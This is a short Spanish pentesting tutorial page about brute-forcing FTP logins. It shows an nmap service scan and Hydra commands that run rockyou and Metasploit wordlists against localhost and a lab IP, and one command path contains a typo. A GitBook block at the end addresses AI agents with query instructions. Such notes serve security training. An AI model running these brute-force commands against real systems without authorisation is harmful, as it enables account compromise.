> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/ports-and-services/ftp-21/ftp-brute-force-attack.md).

# FTP - Ataque de fuerza bruta

1. Ejecuta el siguiente comando con [Nmap](/es/reconnaissance/nmap.md) para comprobar la versión de FTP y buscar vulnerabilidades conocidas:

```bash
nmap -sCV -p21 127.0.0.1
```

2. La versión instalada es **7.93** y no se detectan vulnerabilidades conocidas.

<figure><img src="/files/035feefbed2af055a973d7afc0ee48c95b7608b1" alt=""><figcaption></figcaption></figure>

3. Ejecuta un ataque de fuerza bruta con **Hydra**. Minúsculas `-l` o `-p` significa que el nombre de usuario o la contraseña están fijos; mayúsculas `-L` o `-P` significa que Hydra lee valores de un archivo.

```bash
hydra -l jordan -P /usr/share/wordlists/rockyou.txt ftp://127.0.0.1 -t 15
```

4. Se han encontrado credenciales válidas.

<div data-full-width="false"><figure><img src="/files/6bf093b645b3a79855b54b954c05e556a50699dd" alt=""><figcaption></figcaption></figure></div>

**Ataque de fuerza bruta FTP con listas de palabras comunes de usuarios y contraseñas**

{% code overflow="wrap" %}

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-frameword/data/wordlists/unix_passwords.txt 10.10.10.10. -t 4 ftp
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/ports-and-services/ftp-21/ftp-brute-force-attack.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
